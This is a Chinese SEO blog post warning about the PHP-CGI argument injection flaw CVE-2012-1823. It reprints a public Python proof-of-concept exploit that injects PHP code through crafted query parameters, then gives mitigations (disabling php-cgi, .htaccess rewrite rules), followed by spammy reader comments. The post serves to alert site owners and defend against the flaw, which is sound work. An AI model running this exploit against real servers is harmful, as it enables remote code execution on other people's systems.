毅新SEO

可能系顺德最好嘅SEO网站

PHP-CGI超级漏洞解决方法

超级漏洞

近期顺德SEO发现相关网站爆出PHP-CGI超级漏洞问题,黑客可以利用该漏洞下载黑客后门程序执行,最终取得主机控制权限。该漏洞风险极高,请用到mod_cgi模块的用户见到此公告后务必及时进行处理。经顺德SEO网站安全工程师研究,该漏洞是用户将HTTP请求参数提交至Apache服务器,通过mod_cgi模块交给后端的php-cgi处理,但在执行过程中部分字符没有得到处理,比如空格、等号(=)、减号(-)等。利用这些字符,攻击者可以向后端的php-cgi解析程序提交恶意数据,php-cgi会将这段“数据”当做php参数直接执行。

恶意代码

PHP-CGI漏洞最早由国外安全研究者于近日公开,其实际存在的时间则长达约8年之久。目前截获到的攻击主要利用以下PHP参数:

《PHP-CGI超级漏洞解决方法》

顺德SEO发现PHP漏洞

国外黑客公开的测试代码:

####################################################################################### Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit
# Date: May 4, 2012
# Author: rayh4c[0x40]80sec[0x2e]com
# Exploit Discovered by wofeiwo[0x40]80sec[0x2e]com
######################################################################################

importsocket
importsys

defcgi_exploit():
pwn_code =”””<?php phpinfo();?>”””
post_Length =len(pwn_code)
http_raw=”””POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %s

%s
“””%(HOST , post_Length ,pwn_code)
printhttp_raw
try:
sock =socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, int(PORT)))
sock.send(http_raw)
data =sock.recv(10000)
printrepr(data)
sock.close()
exceptsocket.error, msg:
sys.stderr.write(“[ERROR] %s\n”%msg[1])
sys.exit(1)

if__name__ ==’__main__’:
try:
HOST =sys.argv[1]
PORT =sys.argv[2]
cgi_exploit()
exceptIndexError:
print'[+]Usage: cgi_test.py site.com 80′
sys.exit(-1)

解决方法

停用PHP-CGI

已经顺德SEO网站安全工程师分析,强烈建议停用闲置的php-cgi。

设置.htaccess

如必须使用php-cgi的话,顺德SEO网站安全工程师建议您修改.htaccess配置文件。该文件你可以通过在主机-站点详情-URL重写那里设置启动,将下面的代码复制进去就可以过滤?、-等参数。

    RewriteEngine On
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|- [NC]
RewriteRule .? – [F,L]

 

除非注明,本站文章均属原创。如转载本篇文章,请注明:转载自顺德SEO

本文地址: PHP-CGI超级漏洞解决方法

你可能感兴趣的文章

点赞
  1. 购物狂说道:

    来访了,记得回访哦。

  2. 绣花说道:

    给你的博客踩踩!

  3. gq598说道:

    博客写的不错

  4. SEO说道:

    来看看....

  5. 网站优化说道:

    写的不错,可不是很懂

  6. 扈氏鼻炎舒通膏说道:

    写的不错 期待下一篇!

  7. 郑州婚纱摄影说道:

    看不懂啊支持一下了

    1. 顺德SEO说道:

      多来看看就懂了

  8. 3吨洒水车厂家说道:

    好可怕

  9. 石家庄婚纱摄影说道:

    了解一下了

  10. 圆刀片说道:

    支持并学些了

  11. meme whatsapp说道:

    Magnificent website. Plenty of helpful information here. I am
    sending it to several pals ans also sharing in delicious.
    And of course, thanks on your sweat!

发表评论

电子邮件地址不会被公开。 必填项已用*标注